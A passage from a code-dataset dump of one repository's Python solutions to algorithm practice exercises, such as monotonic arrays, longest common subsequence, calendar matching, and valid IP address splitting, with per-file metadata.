"content_id": "545df3438941e5276de1fc99ba5fa990858ec5a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 239,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 11,
"path": "/ArraysCategory/MonotonicArray/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "def isMonotonic(array):\n inc = True\n dec = True\n\t\n for index in range(1, len(array)):\n\t if array[index] < array[index - 1]:\n\t\t inc = False\n\t if array[index] > array[index - 1]:\n\t\t dec = False\n\t\t\t\n return inc or dec\n"
},
{
"alpha_fraction": 0.3919062912464142,
"alphanum_fraction": 0.44302448630332947,
"avg_line_length": 30.33333396911621,
"blob_id": "422d5106f790201ce94e09f7e1508c281f533805",
"content_id": "a3825a5aef6e79238f2b6b8ce31b7c36c85effcb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 939,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 30,
"path": "/DynamicProgramming/LongestCommonSubsequence/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(nm) time | O(nm) space\ndef longestCommonSubsequence(str1, str2):\n lcs = [[[None, 0, None, None] for i in range(len(str1) + 1)] for j in range(len(str2) + 1)]\n\n for i in range(1, len(str2) + 1):\n for j in range(1, len(str1) + 1):\n if str2[i - 1] == str1[j - 1]:\n lcs[i][j] = [str2[i - 1], lcs[i - 1][j - 1][1] + 1, i - 1, j - 1] \n else:\n if lcs[i][j - 1][1] > lcs[i - 1][j][1]:\n lcs[i][j] = [None, lcs[i][j - 1][1], i, j - 1]\n else:\n lcs[i][j] = [None, lcs[i - 1][j][1], i - 1, j]\n\n\n result = []\n i = len(lcs) - 1\n j = len(lcs[0]) - 1\n while i != 0 and j != 0:\n curr = lcs[i][j]\n if curr[0] is not None:\n result.append(curr[0])\n i = curr[2]\n j = curr[3]\n\n return list(reversed(result))\nstr1 = \"XKYKZPW\"\nstr2 = \"ZXVVYZW\"\n\nprint(longestCommonSubsequence(str1, str2))"
},
{
"alpha_fraction": 0.4735516309738159,
"alphanum_fraction": 0.50629723072052,
"avg_line_length": 29.615385055541992,
"blob_id": "85a56f266f9a63290a52338dd8039ee911f8e098",
"content_id": "7b6db48ece81b7514a968bad800f512053f481fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 397,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 13,
"path": "/DynamicProgramming/MinNumberOfJumps/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(1) space\ndef minNumberOfJumps(array):\n max_reach = array[0]\n steps = array[0]\n jumps = 0\n if len(array) == 0 or len(array) == 1: return 0\n for i in range(1, len(array)):\n if i == len(array) - 1: return jumps + 1\n max_reach = max(max_reach, array[i] + i)\n steps -= 1\n if steps == 0:\n jumps += 1\n steps = max_reach - i"
},
{
"alpha_fraction": 0.6063122749328613,
"alphanum_fraction": 0.6320598125457764,
"avg_line_length": 37.870967864990234,
"blob_id": "dec114f8dad7ab80c66e311574b47d397f7446eb",
"content_id": "b2f18b65cf76d6de746a1a39c4b8bff296e24cd3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1204,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 31,
"path": "/ArraysCategory/SpiralTraverse/my_solution_2.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef spiralTraverse(array):\n output_array = []\n fill_with_perimeters(array, 0, 0, len(array) - 1, len(array[0]) - 1, output_array)\n return output_array\n\n\ndef fill_with_perimeters(array, up_row_index, left_column_index, down_row_index, right_column_index, \n\t\t\t\t\t output_array):\n if left_column_index > right_column_index or up_row_index > down_row_index: return\n for i in range(left_column_index, right_column_index + 1):\n\t output_array.append(array[up_row_index][i])\n\n for i in range(up_row_index, down_row_index):\n output_array.append(array[i + 1][right_column_index])\n\t\t\n for i in range(right_column_index, left_column_index, -1):\n if up_row_index != down_row_index:\n\t output_array.append(array[down_row_index][i - 1])\n\t\t\n for i in range(down_row_index, up_row_index + 1, -1):\n if right_column_index != left_column_index:\n\t output_array.append(array[i - 1][left_column_index])\n\t\t\n fill_with_perimeters(array, up_row_index + 1, left_column_index + 1, down_row_index - 1,\n\t\t\t\t\t\tright_column_index - 1, output_array)\n\narr = [ [1, 2, 3, 4], \n [10, 11, 12, 5], \n [9, 8, 7, 6]]\nprint(spiralTraverse(arr))"
},
{
"alpha_fraction": 0.46700507402420044,
"alphanum_fraction": 0.4885786771774292,
"avg_line_length": 29.30769157409668,
"blob_id": "dcd8d9f6cc7c21aced654609a6642130c939e000",
"content_id": "1b08e8ca714db0ccd88a02d9ca52ea94a99dbab5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 788,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 26,
"path": "/ArraysCategory/LargestRange/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(1) space\ndef largestRange(array):\n \n \n min_elem = min(array)\n max_elem = max(array)\n \n result = [min_elem, min_elem]\n tmp = [min_elem, min_elem]\n for elem in range(min_elem + 1, max_elem + 1):\n if elem in array:\n tmp[1] = elem\n else:\n distance_result = result[1] - result[0]\n distance_tmp = tmp[1] - tmp[0]\n if distance_tmp > distance_result:\n result = tmp[0:]\n tmp.clear()\n tmp.append(elem + 1)\n tmp.append(elem + 1)\n if elem == max_elem:\n distance_result = result[1] - result[0]\n distance_tmp = tmp[1] - tmp[0]\n if distance_tmp > distance_result:\n result = tmp[0:]\n return result\n"
},
{
"alpha_fraction": 0.4815518260002136,
"alphanum_fraction": 0.5355398654937744,
"avg_line_length": 34.79611587524414,
"blob_id": "71ba90f4eafbd6b3027a49a148e8f860ff63dc1f",
"content_id": "9ed7e12fe1aba6cecabdd507aaae1e45bc044ddd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3686,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 103,
"path": "/ArraysCategory/CalendarMatching/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(c1 + c2) time | O(c1 + c2) space where c1 = calendar1 and c2 = calendar2 length\ndef calendarMatching(calendar1: list, bounds1: list, calendar2: list, bounds2: list, meeting_Duration: int)-> list:\n i = 0\n j = 0\n\n new_calendar1 = [['0:00', bounds1[0]]] + calendar1 + [[bounds1[1], '23:59']]\n new_calendar2 = [['0:00', bounds2[0]]] + calendar2 + [[bounds2[1], '23:59']]\n\n calendar = []\n last_appended_index = -1\n\n while i < len(new_calendar1) and j < len(new_calendar2):\n start1 = military_time_to_minutes(new_calendar1[i][0])\n start2 = military_time_to_minutes(new_calendar2[j][0])\n\n end1 = military_time_to_minutes(new_calendar1[i][1])\n end2 = military_time_to_minutes(new_calendar2[j][1])\n\n if len(calendar) != 0:\n last_end = military_time_to_minutes(calendar[last_appended_index][1])\n else: last_end = -10\n\n\n if start1 <= start2:\n if start1 < last_end and end1 > last_end:\n calendar[last_appended_index][1] = minutes_to_military_time(end1)\n i += 1\n continue\n elif start1 < last_end and end1 < last_end:\n i += 1\n continue\n new_start = start1\n if end1 < start2:\n new_end = end1\n calendar.append([minutes_to_military_time(new_start), minutes_to_military_time(new_end)])\n last_appended_index += 1\n i += 1\n else:\n new_end = max(end1, end2)\n calendar.append([minutes_to_military_time(new_start), minutes_to_military_time(new_end)])\n last_appended_index += 1\n i += 1\n j += 1\n else:\n if start2 < last_end and end2 > last_end:\n calendar[last_appended_index][1] = minutes_to_military_time(end2)\n j += 1\n continue\n elif start2 < last_end and end2 < last_end:\n j += 1\n continue\n new_start = start2\n if end2 < start1:\n new_end = end2\n calendar.append([minutes_to_military_time(new_start), minutes_to_military_time(new_end)])\n last_appended_index += 1\n j += 1\n else:\n new_end = max(end1, end2)\n calendar.append([minutes_to_military_time(new_start), minutes_to_military_time(new_end)])\n last_appended_index += 1\n i += 1\n j += 1\n\n for index in range(i, len(new_calendar1)):\n calendar.append(new_calendar1[index])\n for index in range(j, len(new_calendar2)):\n calendar.append(new_calendar2[index])\n\n result = []\n for i in range(len(calendar) - 1):\n if military_time_to_minutes(calendar[i + 1][0]) - military_time_to_minutes(calendar[i][1]) >= meeting_Duration:\n result.append([calendar[i][1], calendar[i + 1][0]])\n\n return result\n\ndef military_time_to_minutes(time: str)-> int:\n hour, minute = time.split(':')\n return int(hour) * 60 + int(minute)\ndef minutes_to_military_time(minutes: int)-> str:\n hour = int(minutes / 60)\n minute = minutes % 60\n string_min = str(minute)\n if str(minute) == '0':\n string_min = '00'\n\n return str(hour) + ':' + string_min\n\ncalendar1 = [\n [\"10:00\", \"10:30\"],\n [\"10:45\", \"11:15\"],\n [\"11:30\", \"13:00\"],\n [\"14:15\", \"16:00\"],\n [\"16:00\", \"18:00\"]\n ]\n\ncalendar2 = [[\"10:00\", \"11:00\"], [\"10:30\", \"16:30\"]]\nbounds1 = [\"9:30\", \"20:00\"]\n\nbounds2 = [\"9:00\", \"22:30\"]\nmeeting_Duration = 60\n\nprint(calendarMatching(calendar1, bounds1, calendar2, bounds2, meeting_Duration))"
},
{
"alpha_fraction": 0.5014662742614746,
"alphanum_fraction": 0.5190615653991699,
"avg_line_length": 30.090909957885742,
"blob_id": "3c72b9b324b87e5bfe212816c942ba258080fb38",
"content_id": "8e268b5b13f41578832d7443ea60a8bec331256e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 341,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 11,
"path": "/Sorting/InsertionSort/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "#O(n)-best O(n)-avarage time | O(1) space\ndef insertionSort(array: list) -> list:\n for i in range(1, len(array)):\n j = i\n while j > 0 and array[j] < array[j - 1]:\n swap(j, j - 1, array)\n j -= 1\n return array\n\ndef swap(i: int, j: int, array: list) -> None:\n array[i], array[j] = array[j], array[i]"
},
{
"alpha_fraction": 0.5680751204490662,
"alphanum_fraction": 0.5680751204490662,
"avg_line_length": 22.77777862548828,
"blob_id": "ef8a0f28469e641a1bf0f92dcba503558a1c6daf",
"content_id": "2e550bc2949b57ec67f070ec0e5419696b91940e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 213,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 9,
"path": "/ArraysCategory/TwoNumberSum/solution_2.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef twoNumberSum(array, targetSum):\n nums = {}\n for num in array:\n\t if targetSum - num in nums:\n\t\t return [num, targetSum - num]\n\t else:\n\t\t nums[num] = True\n return []"
},
{
"alpha_fraction": 0.6376495957374573,
"alphanum_fraction": 0.6474428772926331,
"avg_line_length": 28.645160675048828,
"blob_id": "55ca855408c97ac8cf0cdca85af9d3eb18637e6f",
"content_id": "c3bd96646738ec96092cfb74d8b98b4fb704d105",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 919,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 31,
"path": "/ArraysCategory/SmallestDifference/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(nlog(n) + mlog(m)) space | O(1) time\ndef smallestDifference(arrayOne, arrayTwo):\n\tarrayOne.sort()\n\tarrayTwo.sort()\n\n\tleft_one = 0\n\tleft_two = 0\n\t\t\n\tnum_one = 99\n\tnum_two = 99\n\tdiff = float('inf')\n\t\t\n\twhile left_one < len(arrayOne) and left_two < len(arrayTwo):\n\t\tif arrayOne[left_one] == arrayTwo[left_two]:\n\t\t\tnum_one = arrayOne[left_one]\n\t\t\tnum_two = arrayTwo[left_two]\n\t\t\tdiff = abs(arrayOne[left_one] - arrayTwo[left_two])\n\t\t\tbreak\n\t\telif arrayOne[left_one] < arrayTwo[left_two]:\n\t\t\tif abs(arrayOne[left_one] - arrayTwo[left_two]) < diff:\n\t\t\t\tnum_one = arrayOne[left_one]\n\t\t\t\tnum_two = arrayTwo[left_two]\n\t\t\t\tdiff = abs(arrayOne[left_one] - arrayTwo[left_two])\n\t\t\tleft_one += 1\n\t\telse:\n\t\t\tif abs(arrayOne[left_one] - arrayTwo[left_two]) < diff:\n\t\t\t\tnum_one = arrayOne[left_one]\n\t\t\t\tnum_two = arrayTwo[left_two]\n\t\t\t\tdiff = abs(arrayOne[left_one] - arrayTwo[left_two])\n\t\t\tleft_two += 1\n\treturn [num_one, num_two]\n"
},
{
"alpha_fraction": 0.4771897792816162,
"alphanum_fraction": 0.5082116723060608,
"avg_line_length": 34.3870964050293,
"blob_id": "8205fe450f6b5aa1e92129b11e46976046d30336",
"content_id": "a3185cda7d3f7e58aae0d4fac5ff6ba68fb5623e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1096,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 31,
"path": "/ArraysCategory/FourNumberSum/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(n^2) space\ndef fourNumberSum(array, targetSum):\n two_number_all_possible_sums = {}\n for i in range(len(array)):\n for j in range(len(array)):\n if i != j:\n if (i, j) not in two_number_all_possible_sums and (j, i) not in two_number_all_possible_sums:\n two_number_all_possible_sums[(i, j)] = [array[i], array[j]]\n \n\n results = []\n for item1, value1 in two_number_all_possible_sums.items():\n for item2, value2 in two_number_all_possible_sums.items():\n if item1 != item2:\n if value1[0] not in value2 and value1[1] not in value2:\n if sum(value1) + sum(value2) == targetSum:\n if sum(value1) + sum(value2) not in results:\n arr = [value1[0], value1[1], value2[0], value2[1]]\n arr.sort()\n if arr not in results:\n results.append(arr)\n\n return results\n \n\n\n\narr = [7, 6, 4, -1, 1, 2]\ntargSum = 16\n\nprint(fourNumberSum(arr, targSum))"
},
{
"alpha_fraction": 0.6094316840171814,
"alphanum_fraction": 0.61426842212677,
"avg_line_length": 25.677419662475586,
"blob_id": "876fc71a5b5e7152256f776cdf35b9b490e9e423",
"content_id": "a318327f51a9e68de590b57b0f69d78e61f42f84",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 827,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 31,
"path": "/ArraysCategory/MonotonicArray/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "def isMonotonic(array):\n if len(array) == 0: return True\n\t\n increasing_sum = array[0]\n decreasing_sum = array[0]\n\t\n increasing_type = False\n decreasing_type = False\n\t\n for index in range(1, len(array)):\n\t if not increasing_type and not decreasing_type:\n\t\t if array[index] == increasing_sum == decreasing_sum:\n\t\t\t continue\n\t\t elif array[index] > increasing_sum:\n\t\t\t increasing_type = True\n\t\t\t increasing_sum = array[index]\n\t\t else:\n\t\t\t decreasing_type = True\n\t\t\t decreasing_sum = array[index]\n\t\t\t\n\t if increasing_type:\n\t\t if array[index] < increasing_sum:\n\t\t\t return False\n\t\t else:\n\t\t\t increasing_sum = array[index]\n\t elif decreasing_type:\n\t\t if array[index] > decreasing_sum:\n\t\t\t return False\n\t\t else:\n\t\t\t decreasing_sum = array[index]\n return True\n"
},
{
"alpha_fraction": 0.5967540740966797,
"alphanum_fraction": 0.6192259788513184,
"avg_line_length": 32.41666793823242,
"blob_id": "a3129ec7ed720a0ff5467e9fcbca5c9dcd046b61",
"content_id": "6d042ee1f083baa5f45af14f630652edad5bcb5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 801,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 24,
"path": "/Strings/LongestPalindromicSubstring/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(1) space\ndef longestPalindromicSubstring(string):\n longest_palindrome = [0, 1]\n for i in range(1, len(string)):\n odd = expand_from_index(string, i - 1, i + 1)\n even = expand_from_index(string, i - 1, i)\n tmp_longest = max(odd, even, key=lambda x : x[1] - x[0])\n longest_palindrome = max(longest_palindrome, tmp_longest, key=lambda x : x[1] - x[0])\n return string[longest_palindrome[0]: longest_palindrome[1]]\n\ndef expand_from_index(string, left, right):\n leftid = left\n rightid = right\n\n while leftid >= 0 and rightid < len(string):\n if string[leftid] != string[rightid]:\n break\n leftid -= 1\n rightid += 1\n\n return [leftid + 1, rightid]\n\nstring = 'abaxyzzyxf'\nprint(longestPalindromicSubstring(string))"
},
{
"alpha_fraction": 0.5040000081062317,
"alphanum_fraction": 0.5199999809265137,
"avg_line_length": 31.65217399597168,
"blob_id": "fbe55cf621fd25719dab973899a0f37af617cbd2",
"content_id": "bc77e7a008ce94ee3ad1233893e5e53cf14e443f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 750,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 23,
"path": "/DynamicProgramming/PalindromePartitioningMinCuts/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^3) time | O(n) space\ndef palindromePartitioningMinCuts(string):\n cuts = [float('inf') for i in range(len(string))]\n palindromes = [False for i in range(len(string))]\n cuts[0] = 1 \n\n for i in range(1, len(string)):\n for j in range(0, i):\n if isPalindrome(string[j: i + 1]):\n palindromes[i] = True\n if palindromes[j]:\n cuts[i] = min(cuts[i], cuts[j] + 1)\n else:\n cuts[i] = min(cuts[i], cuts[j])\n else:\n cuts[i] = min(cuts[i], cuts[i - 1] + 1)\n return (cuts[-1] - 1)\n\ndef isPalindrome(string):\n return string == string[::-1]\n\nstring = \"ababbbabbababa\"\nprint(palindromePartitioningMinCuts(string))"
},
{
"alpha_fraction": 0.4259471893310547,
"alphanum_fraction": 0.46268656849861145,
"avg_line_length": 30.14285659790039,
"blob_id": "cd57f21ad8c7bbde5150b869c5bae2d711d224fe",
"content_id": "7c57543d3fc9dfe8e11ea05108aed38a0c57f08c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 871,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 28,
"path": "/ArraysCategory/LongestPeak/my_solution_2.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(1) space\ndef longestPeak(array):\n longest_peak_length = 0\n for i in range(1, len(array) - 1):\n isPeak = array[i - 1] < array[i] and array[i] > array[i + 1]\n \n if not isPeak:\n continue\n print(array[i - 1], array[i], array[i + 1])\n curr_peak_length = 3\n \n for j in range(i - 2, -1, -1):\n if array[j + 1] > array[j]:\n curr_peak_length += 1\n else: break\n \n for j in range(i + 1, len(array) - 1):\n if array[j] > array[j + 1]:\n curr_peak_length += 1\n else: break\n \n if curr_peak_length > longest_peak_length:\n longest_peak_length = curr_peak_length\n \n return longest_peak_length\n\narr = [1, 2, 3, 3, 4, 0, 10, 6, 5, -1, -3, 2, 3]\nprint(longestPeak(arr))"
},
{
"alpha_fraction": 0.44359949231147766,
"alphanum_fraction": 0.46768060326576233,
"avg_line_length": 28.259260177612305,
"blob_id": "0810f26efac2a6ee3cf30a2b33d09021606fc0e3",
"content_id": "9d738eb3f181cad82529c8f52265c2567fb0e2d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 789,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 27,
"path": "/Strings/ValidIPAddresses/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(1) time | O(1) space\ndef validIPAddresses(string):\n Ips = []\n for i in range(1, min(len(string), 4)):\n parts = ['', '', '', '']\n parts[0] = string[:i]\n if not isValid(parts[0]):\n continue\n\t\t\n for j in range(i + 1, i + min(len(string) - i, 4)):\n parts[1] = string[i : j]\n if not isValid(parts[1]):\n continue\n\t\t\t\t\n for k in range(j + 1, j + min(len(string) - j, 4)):\n parts[2] = string[j: k]\n parts[3] = string[k:]\n\t\t\t\t\n if isValid(parts[2]) and isValid(parts[3]):\n Ips.append('.'.join(parts))\n return Ips\n\t\ndef isValid(string: str) -> bool:\n\tnum = int(string)\n\tif num > 255:\n\t\treturn False\n\treturn len(string) == len(str(num))"
},
{
"alpha_fraction": 0.5775076150894165,
"alphanum_fraction": 0.5927051901817322,
"avg_line_length": 24.384614944458008,
"blob_id": "b12b0a6c30119d7755f0cba10544d254001d8b7b",
"content_id": "d2fb003691c07f7faf48d791fb7a7d313285e07d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 329,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 13,
"path": "/ArraysCategory/ValidateSubsequence/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(1) space\ndef isValidSubsequence(array, sequence):\n curr_index = -1\n for elem in sequence:\n\t if elem not in array:\n\t\t return False\n\t else:\n\t\t if array.index(elem) <= curr_index:\n\t\t\t return False\n\t\t else:\n\t\t\t curr_index = array.index(elem)\n\t\t\t array[curr_index] = -99\n return True"
},
{
"alpha_fraction": 0.4984227120876312,
"alphanum_fraction": 0.539432168006897,
"avg_line_length": 32.421051025390625,
"blob_id": "97e3422fc01097547e716d2740f56e8819470746",
"content_id": "f92e603e103ea1bad364c4d0ad04f07b165d4eaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 634,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 19,
"path": "/DynamicProgramming/LongestCommonSubsequence/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "def longestCommonSubsequence(str1, str2):\n current_row = ['' for i in range(len(str2) + 1)]\n last_row = ['' for i in range(len(str2) + 1)]\n\n for i in range(1, len(str1) + 1):\n for j in range(1, len(str2) + 1):\n if str1[i - 1] == str2[j - 1]:\n current_row[j] = last_row[j - 1] + str1[i - 1]\n else:\n current_row[j] = max(current_row[j - 1], last_row[j], key=len)\n last_row = current_row[0:]\n result = []\n for elem in last_row[-1]:\n result.append(elem)\n return result\nstr1 = \"XKYKZPW\"\nstr2 = \"ZXVVYZW\"\n\nprint(longestCommonSubsequence(str1, str2))"
},
{
"alpha_fraction": 0.5241379141807556,
"alphanum_fraction": 0.5329153537750244,
"avg_line_length": 31.571428298950195,
"blob_id": "a127ace2356ea2d487711267366ba1af2589f6ab",
"content_id": "3a22500bf775b50538cb1779cc19ff369156725a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1595,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 49,
"path": "/ArraysCategory/ApartmentHunting/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(b^2a) time | O(ba) space where b = number of block and a = number of attributes\nimport copy\ndef apartmentHunting(blocks, reqs):\n building_distances_for_blocks = []\n for block in blocks:\n building_distances_for_blocks.append(copy.deepcopy(block))\n\n for index, b in enumerate(building_distances_for_blocks, 0):\n for key, _ in b.items():\n if not blocks[index][key]:\n b[key] = float('inf')\n else:\n b[key] = 0\n\n\n\n for index1, block in enumerate(building_distances_for_blocks, 0):\n for key, _ in block.items():\n for index2, b in enumerate(blocks, 0):\n if block[key] != 0:\n if b[key]:\n if abs(index2 - index1) < block[key]:\n block[key] = abs(index2 - index1)\n \n distance = float('inf')\n result_index = -1\n for index, b in enumerate(building_distances_for_blocks, 0):\n block_max = float('-inf')\n for key, _ in b.items():\n if key in reqs:\n block_max = max(b[key], block_max)\n if block_max < distance:\n distance = block_max\n result_index = index\n \n return result_index\n \nblocks = [\n {\"gym\": False, \"school\": True, \"store\": False},\n {\"gym\": True, \"school\": False, \"store\": False},\n {\"gym\": True, \"school\": True, \"store\": False},\n {\"gym\": False, \"school\": True, \"store\": False},\n {\"gym\": False, \"school\": True, \"store\": True}\n ]\n\nreqs = [\"gym\", \"school\", \"store\"]\n\n\nprint(apartmentHunting(blocks, reqs))"
},
{
"alpha_fraction": 0.46427175402641296,
"alphanum_fraction": 0.47130027413368225,
"avg_line_length": 35.08450698852539,
"blob_id": "779312869d2fca46bcc97bec46a472b12be16aa6",
"content_id": "2e909a37c109a3f3cffa533b0c85931904192049",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2561,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 71,
"path": "/Strings/UnderscorifySubstrings/my_Solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "def underscorifySubstring(string, substring):\n first_letter_of_substr = substring[0]\n second_letter_of_substr = substring[1]\n first_index = -1\n last_index = -1\n running = False\n found = False\n\n substr_index = 0\n result = []\n\n for i in range(len(string)):\n if not running:\n if found:\n if string[i] == first_letter_of_substr:\n #print('i')\n substr_index = 1\n running = True\n elif string[i] == second_letter_of_substr:\n substr_index = 2\n running = True\n else:\n found = False\n #print('fewfwefwef')\n #print(first_index, last_index, i)\n result.append((first_index, last_index))\n #print(string[i])\n else:\n if string[i] == first_letter_of_substr:\n running = True\n first_index = i\n substr_index = 1\n #else:\n #if found:\n #found = False\n #print('fewfwefwef')\n #print(first_index, last_index, i)\n #result.append((first_index, last_index))\n #string = string[0: first_index] + '_' + string[first_index: last_index] + '_' + string[last_index:]\n else:\n if substr_index == len(substring) - 1 and string[i] == substring[substr_index]:\n #print(string[i], substring[substr_index], substr_index,end='\\n')\n #print('megvan')\n last_index = i\n found = True\n running = False\n if i == len(string) - 1:\n result.append((first_index, last_index))\n #i -= 1\n elif string[i] == substring[substr_index]:\n #print(string[i], substring[substr_index], substr_index)\n substr_index += 1\n else:\n running = False\n if found:\n result.append((first_index, last_index))\n found = False\n\n offset = 0\n print(result)\n for elem in result:\n first, second = elem\n string = string[0: first + offset] + '_' + string[first + offset: second + 1 + offset] + '_' + string[second + 1 + offset:]\n offset += 2\n return string\n \n\nstring = \"abcabcabcabcabcabcabcabcabcabcabcabcabcabc\"\nsubstr = \"abc\"\n\nprint(underscorifySubstring(string, substr))"
},
{
"alpha_fraction": 0.536796510219574,
"alphanum_fraction": 0.5440115332603455,
"avg_line_length": 25.615385055541992,
"blob_id": "1d80adf3e457b0e618289f5987004b1bffb7e57f",
"content_id": "e8307f80c32e03e6533592ef9ee51a277e87ceda",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 693,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 26,
"path": "/Strings/LongestSubstringWithoutDuplication/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "\ndef longestSubstringWithoutDuplication(string):\n cache = {}\n longest_substr = []\n\n tmp_substr = []\n\n i = 0\n while i < len(string):\n letter = string[i]\n if letter not in cache:\n cache[letter] = i\n tmp_substr.append(letter)\n i += 1\n else:\n if len(tmp_substr) > len(longest_substr):\n longest_substr = tmp_substr[0:]\n tmp_substr = []\n i = cache[letter] + 1\n cache = {} \n if len(tmp_substr) > len(longest_substr):\n longest_substr = tmp_substr[0:]\n return ''.join(longest_substr)\n\nstring = \"clementisacap\"\n\nprint(longestSubstringWithoutDuplication(string))\n"
},
{
"alpha_fraction": 0.4655396640300751,
"alphanum_fraction": 0.522756814956665,
"avg_line_length": 31.08333396911621,
"blob_id": "b1db8f2ffc9f315627522b2004e4a589efcec98a",
"content_id": "6cac5caa8ac9ce4b30a396b0f21a6eeee8f8f16d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 769,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 24,
"path": "/DynamicProgramming/WaterArea/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef waterArea(heights):\n result_1 = [0 for i in range(len(heights))]\n if len(heights) <= 2: return 0\n for i in range(1, len(heights)):\n if heights[i] > result_1[i - 1]:\n result_1[i] = result_1[i - 1]\n else: result_1[i] = max(heights[i - 1], result_1[i - 1])\n \n result_2 = result_1[0:]\n result_2[-1] = heights[-1]\n for i in reversed(range(len(heights) - 1)):\n result_2[i] = max(heights[i + 1], result_2[i + 1])\n\n result = [min(i, j) for i, j in zip(result_1, result_2)]\n res = [i - j for i, j in zip(result, heights)]\n summ = 0\n for elem in res:\n if elem > 0:\n summ += elem\n return summ\n\narr = [0, 8, 0, 0, 5, 0, 0, 10, 0, 0, 1, 1, 0, 3]\nprint(waterArea(arr))"
},
{
"alpha_fraction": 0.5464926362037659,
"alphanum_fraction": 0.5513865947723389,
"avg_line_length": 37.375,
"blob_id": "0a4b377e535fa0ae68d912bd08fdb2ff1b3cbc59",
"content_id": "ee6acd76ff136e2d46f6c4a05dfdc86f1fe359b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 613,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 16,
"path": "/DynamicProgramming/MaxSumIncreasingSubsequence/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
